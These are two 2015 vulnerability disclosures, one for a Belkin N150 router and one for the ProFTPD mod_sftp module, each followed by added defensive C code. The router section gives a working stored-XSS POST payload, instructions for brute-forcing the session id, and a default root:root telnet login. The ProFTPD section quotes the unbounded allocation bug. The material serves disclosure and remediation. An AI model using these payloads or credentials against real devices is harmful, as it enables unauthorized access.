Full Disclosure:

# Exploit Title      : Belkin N150 Wireless Home Router Multiple Vulnerabilities
# Exploit Author     : Rahul Pratap Singh
# Date               : 30/Nov/2015
# Home Page Link     : http://www.belkin.com
# Blog Url           : 0x62626262.wordpress.com
# Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
# Status             : Not Patched

→ Vulnerability/BUG Report:

1)
• Vulnerability Title  :  HTML/Script Injection
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:
The "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" parameter is vulnerable.
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:
Send the following POST request using Burp Suite or a similar tool:

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title  :  Session Hijacking
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

The sessionid is allocated using hex encoding and has a fixed length of 8 characters. Therefore it is very easy to brute-force it in a feasible amount of time, as this session id ranges from 00000000 to ffffffff.

→ Steps to Reproduce:
Send the following request using Burp Suite and brute-force the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)
• Vulnerability Title  :  Telnet Enabled with Default Pass
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Vulnerability Details:
The Telnet protocol can be used by an attacker to gain remote access to the router with root privileges.

→ Proof of Concept:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:
1) Open terminal
2) Type following command:
        telnet 192.168.2.1
3) Default user and pass is root:root

4)
• Vulnerability Title  :  Cross Site Request Forgery
• Version              :  F9K1009 v1
• Firmware             :  1.00.09

→ Proof of Concept:
Requests do not contain any CSRF token. Therefore, requests can be forged. It can be verified with any request.

Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015
No Response.

Ref:
https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/
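As an added example, not the router's firmware code and not the advisory author's, the following C shows the three server-side controls whose absence items 1, 2 and 4 describe: HTML-escaping the stored X_TWSZ-COM_Language value on output so the "><script> payload renders as text, minting a session id from 128 random bits instead of 32 bits of hex, and comparing a CSRF token in constant time. The function names, the /dev/urandom source, the 16-byte id size and the sample token are assumptions of the example.

```c
/* Added example (not Belkin firmware code): server-side fixes for the webproc
 * issues in the advisory. Names and parameters are the example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Escape the five characters that matter inside HTML text and attribute
 * values. Returns a heap string the caller frees, or NULL on allocation
 * failure. Applied on output, it neutralises the "><script> payload. */
char *html_escape(const char *in) {
    size_t need = 1;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':  need += 5; break;            /* &amp;  */
        case '<': case '>': need += 4; break;   /* &lt; &gt; */
        case '"':  need += 6; break;            /* &quot; */
        case '\'': need += 5; break;            /* &#39;  */
        default:   need += 1;
        }
    }
    char *out = malloc(need);
    if (!out) return NULL;
    char *o = out;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':  o += sprintf(o, "&amp;");  break;
        case '<':  o += sprintf(o, "&lt;");   break;
        case '>':  o += sprintf(o, "&gt;");   break;
        case '"':  o += sprintf(o, "&quot;"); break;
        case '\'': o += sprintf(o, "&#39;");  break;
        default:   *o++ = *p;
        }
    }
    *o = '\0';
    return out;
}

/* Work factor of an id made of hex digits: 4 bits per character. The
 * advisory's 8-character id gives 32 bits; 32 characters give 128. */
unsigned session_id_bits(const char *hex_id) {
    return (unsigned) strlen(hex_id) * 4;
}

/* Mint a session id of n_bytes random bytes from /dev/urandom (assumed
 * CSPRNG source), hex-encoded into out (needs 2*n_bytes+1 bytes).
 * Returns 0 on success, -1 on failure. */
int new_session_id(char *out, size_t n_bytes) {
    unsigned char raw[64];
    if (n_bytes == 0 || n_bytes > sizeof raw) return -1;
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t got = fread(raw, 1, n_bytes, f);
    fclose(f);
    if (got != n_bytes) return -1;
    for (size_t i = 0; i < n_bytes; i++)
        sprintf(out + 2 * i, "%02x", raw[i]);
    return 0;
}

/* Constant-time comparison of the CSRF token submitted in the form body with
 * the one bound to the session, so timing does not leak matching prefixes. */
int csrf_token_valid(const char *submitted, const char *expected) {
    size_t n = strlen(expected);
    if (submitted == NULL || strlen(submitted) != n) return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= (unsigned char) (submitted[i] ^ expected[i]);
    return diff == 0;
}

int main(void) {
    /* Constructed sample: the advisory's payload as it would be stored. */
    const char *payload = "\"><script>alert(\"1\")</script><script>\"";
    char *safe = html_escape(payload);
    printf("rendered: %s\n", safe);
    free(safe);

    char sid[33];
    if (new_session_id(sid, 16) == 0)
        printf("session id: %s (%u bits)\n", sid, session_id_bits(sid));
    printf("advisory's id: %u bits\n", session_id_bits("7cf2e9c5"));
    printf("csrf ok: %d\n", csrf_token_valid("abc123", "abc123"));  /* constructed token */
    return 0;
}
```

Escaping on output is the control that holds regardless of how the value got into the configuration store; an input allow-list of language codes is a useful second layer. The session id change moves the search space from 2^32 to 2^128, which is what makes the brute-force in item 2 infeasible, and the token check only helps if the token is bound to the session and required on every state-changing request to webproc.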
 
 
 
===============================================
Date: 29/11/2015
Credit: Nicholas Lemonias

.::PROFTPD v1.3.5a HEAP OVERFLOWS::.
ADVANCED INFORMATION SECURITY CORPORATION
Keeping Things Simple!
===============================================

[ASCII-art logo omitted]

==================
INTRODUCTION
==================
ProFTPD is free and open-source software, compatible with Unix-like systems and Microsoft Windows (via Cygwin). Along with vsftpd and Pure-FTPd, ProFTPD is among the most popular FTP servers in Unix-like environments today. Compared to those, which focus e.g. on simplicity, speed or security, ProFTPD's primary design goal is to be a highly feature-rich FTP server, exposing a large number of configuration options to the user.

====================================================
Description:
During a manual source code audit of the latest ProFTPD release, various security issues were discovered. [3]

================================================================================
CODE SNIPPET (PoC 1)
===========================
../../mod_sftp/fxp.c:1217-1251

static struct fxp_extpair *fxp_msg_read_extpair(pool *p, unsigned char **buf,
    uint32_t *buflen) {
  uint32_t namelen, datalen;
  unsigned char *name, *data;
  struct fxp_extpair *extpair;

  /* namelen is a peer-supplied 32-bit length; the only check is that the
   * message still holds that many bytes, there is no upper bound. */
  namelen = sftp_msg_read_int(p, buf, buflen);
  if (*buflen < namelen) {
    (void) pr_log_writefile(sftp_logfd, MOD_SFTP_VERSION,
      "SFTP message format error: unable to read %lu bytes of extpair name "
      "data (buflen = %lu)", (unsigned long) namelen, (unsigned long) *buflen);
    SFTP_DISCONNECT_CONN(SFTP_SSH2_DISCONNECT_BY_APPLICATION, NULL);
  }

  /* pool allocation sized directly from the peer's length */
  name = palloc(p, namelen + 1);
  memcpy(name, *buf, namelen);
  (*buf) += namelen;
  (*buflen) -= namelen;
  name[namelen] = '\0';

  datalen = sftp_msg_read_int(p, buf, buflen);
  if (datalen > 0) {
    data = sftp_msg_read_data(p, buf, buflen, datalen);

  } else {
    data = NULL;
  }

  extpair = palloc(p, sizeof(struct fxp_extpair));
  extpair->ext_name = (char *) name;
  extpair->ext_datalen = datalen;
  extpair->ext_data = data;

  return extpair;
}

=====================
RATIONALE
=====================
Part of the SFTP handshake involves "extensions", which are key/value pairs comprised of strings. In SSH, strings are encoded for network transport as a 32-bit length, followed by the bytes.

The mod_sftp module has no manual bounds/length metrics or limitations when reading SFTP extension key/value data from the network.
A malicious attacker might attempt to encode large values and allocate more memory than is necessary, resulting in uncontrollable memory exhaustion and resource consumption.

=======================
CONCLUSION
=======================
To avoid undue resource exhaustion by a remote client, mod_sftp should include a patch on the maximum length of acceptable extension keys/values, as reported by our earlier ProFTPD report.

==============================
REPORT TIMELINE
==============================
22/11/2015  Reported to vendor. (Initial Report) [3]
25/11/2015  Second report to vendor.
29/11/2015  Bug Report / Patch circulation.

Big thanks to TJ from ProFTPD for the prompt response to the issue, and excellent cooperation in security.

==============================
ACKNOWLEDGEMENTS
==============================
PacketStorm Security
TEAM TESO, w00w00, Netric, b0iler (eyeonsecurity), wootehfoot, badpack3t (SP), Vandal (Vic), s0kket, mantis, Big_Al, ELFQrin, bob (dtors), epic, RaT for their ~ legendary mark.

====================
REFERENCES
====================
[1] Proftpd. 2015. Proftpd Bug Report, MOD_SFTP Bug Report. [ONLINE] Available at: http://bugs.proftpd.org/show_bug.cgi?id=4210. [Accessed 29 November 2015].
[2] Lemonias, N. (2015). SecurityFocus - Proftpd Heap Overflow. [ONLINE] Securityfocus.com. Available at: http://www.securityfocus.com/archive/1/536953/30/0/threaded [Accessed 29 November 2015].
[3] Cnvd.org.cn, (2015). China's Emergency Response Team, Proftpd 1.3.5a report - CERT. [online] Available at: http://www.cnvd.org.cn/flaw/show/CNVD-2015-07798 [Accessed 30 Nov. 2015].
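As an added example, not ProFTPD's code and not the advisory's, the following C reads the same SSH string-encoded key/value pairs as the fxp_msg_read_extpair() quoted under CODE SNIPPET (PoC 1), but checks each declared length against a maximum (the cap the CONCLUSION asks for) and against the bytes actually present before allocating anything. The struct and function names, the cap values MAX_EXT_NAME and MAX_EXT_DATA, the error codes and the three constructed messages are assumptions of the example; it uses malloc rather than ProFTPD's pool allocator.

```c
/* Added example, not ProFTPD code: bounds-checked extpair reader. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_EXT_NAME 256          /* assumed cap on an extension name   */
#define MAX_EXT_DATA (64 * 1024)  /* assumed cap on extension data      */

enum ext_err { EXT_OK = 0, EXT_TRUNCATED = -1, EXT_TOO_LONG = -2, EXT_NOMEM = -3 };

struct extpair {          /* assumed shape, mirrors the quoted fxp_extpair */
    char *name;
    uint32_t datalen;
    unsigned char *data;
};

/* Read a big-endian uint32 only if four bytes remain in the message. */
static int read_u32(const unsigned char **buf, size_t *buflen, uint32_t *out) {
    if (*buflen < 4) return EXT_TRUNCATED;
    *out = ((uint32_t)(*buf)[0] << 24) | ((uint32_t)(*buf)[1] << 16) |
           ((uint32_t)(*buf)[2] << 8)  |  (uint32_t)(*buf)[3];
    *buf += 4; *buflen -= 4;
    return EXT_OK;
}

/* Read one SSH "string": the declared length is checked against the cap
 * and against the bytes actually present before any allocation happens. */
static int read_string(const unsigned char **buf, size_t *buflen, uint32_t cap,
                       unsigned char **out, uint32_t *outlen) {
    uint32_t len;
    int rc = read_u32(buf, buflen, &len);
    if (rc != EXT_OK) return rc;
    if (len > cap) return EXT_TOO_LONG;          /* bounded before malloc   */
    if (len > *buflen) return EXT_TRUNCATED;     /* never read past the msg */
    unsigned char *p = malloc((size_t)len + 1);  /* len <= cap, cannot wrap */
    if (!p) return EXT_NOMEM;
    memcpy(p, *buf, len);
    p[len] = '\0';
    *buf += len; *buflen -= len;
    *out = p; *outlen = len;
    return EXT_OK;
}

/* Parse name + data. On error nothing stays allocated; the caller should
 * treat any non-zero result as a protocol error and drop the connection. */
int read_extpair(const unsigned char **buf, size_t *buflen, struct extpair *ep) {
    unsigned char *name; uint32_t namelen;
    int rc = read_string(buf, buflen, MAX_EXT_NAME, &name, &namelen);
    if (rc != EXT_OK) return rc;
    unsigned char *data; uint32_t datalen;
    rc = read_string(buf, buflen, MAX_EXT_DATA, &data, &datalen);
    if (rc != EXT_OK) { free(name); return rc; }
    ep->name = (char *)name; ep->datalen = datalen; ep->data = data;
    return EXT_OK;
}

void free_extpair(struct extpair *ep) { free(ep->name); free(ep->data); }

/* Convenience wrapper: parse one constructed message from its start. */
int parse_sample(const unsigned char *msg, size_t len, struct extpair *ep) {
    const unsigned char *p = msg; size_t n = len;
    return read_extpair(&p, &n, ep);
}

/* Constructed messages (not captured traffic). */
static const unsigned char GOOD[] = {            /* "newline" -> "\r\n"      */
    0,0,0,7, 'n','e','w','l','i','n','e', 0,0,0,2, '\r','\n' };
static const unsigned char HUGE[] = {            /* 0xffffffff byte name     */
    0xff,0xff,0xff,0xff, 'a','b' };
static const unsigned char SHORT[] = {           /* claims 7 bytes, has 3    */
    0,0,0,7, 'n','e','w' };

int main(void) {
    struct extpair ep;
    if (parse_sample(GOOD, sizeof GOOD, &ep) == EXT_OK) {
        printf("name=%s datalen=%u\n", ep.name, (unsigned) ep.datalen);
        free_extpair(&ep);
    }
    printf("huge -> %d, short -> %d\n", parse_sample(HUGE, sizeof HUGE, &ep),
           parse_sample(SHORT, sizeof SHORT, &ep));
    return 0;
}
```

The ordering of the two checks is the point: the cap is compared first, so a peer-supplied length of 0xffffffff is rejected before the code ever consults the buffer or touches an allocator, and the message-length check then catches the separate case of a plausible length that the message does not actually carry.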